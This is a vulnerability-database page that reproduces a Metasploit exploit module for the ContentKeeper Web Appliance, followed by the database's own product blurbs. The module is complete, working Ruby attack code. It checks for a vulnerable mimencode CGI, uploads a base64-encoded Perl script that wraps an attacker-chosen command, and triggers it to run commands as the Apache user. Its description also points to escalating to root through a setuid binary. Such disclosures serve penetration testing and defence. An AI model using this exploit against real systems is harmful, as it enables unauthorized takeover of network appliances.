Lucene search
K

ContentKeeper Web Remote Command Execution

🗓️ 28 Oct 2009 00:00:00Reported by patrickType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

ContentKeeper Web Remote Command Execution for Apache use

Code
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ContentKeeper Web Remote Command Execution',  
'Description' => %q{  
This module exploits the ContentKeeper Web Appliance. Versions prior  
to 125.10 are affected. This module exploits a combination of weaknesses  
to enable remote command execution as the Apache user. Following exploitation  
it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'  
to escalate to root.  
},  
'Author' => [ 'patrick' ],  
'Arch' => [ ARCH_CMD ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'OSVDB', '54551'],  
[ 'OSVDB', '54552'],  
[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 1024,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby telnet',  
}  
},   
'Platform' => ['unix'],  
'Targets' =>  
[  
[ 'Automatic', { } ]  
],  
'DisclosureDate' => 'Feb 25 2009',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(80),  
],self.class)  
end  
  
def check  
connect  
sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")  
banner = sock.get(-1,3)  
disconnect  
  
if (banner =~ /500 Internal/)  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
  
exp = "#!/usr/bin/perl\n"  
exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"  
exp << "system(\""  
exp << payload.encoded.gsub('"', '\"')  
exp << "\");\n"  
  
body = Rex::Text.encode_base64(exp)  
  
connect  
  
sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"  
sploit << "Host: #{datastore['RHOST']}\r\n"  
sploit << "Content-Length: #{body.length}\r\n\r\n"  
  
print_status("Uploading payload to target.")  
sock.put(sploit + body + "\r\n\r\n")  
disconnect  
  
sleep(5)  
print_status("Calling payload...")  
connect  
req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx  
req << "Host: #{datastore['RHOST']}\r\n"  
sock.put(req + "\r\n\r\n")  
  
handler  
disconnect  
end  
end  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation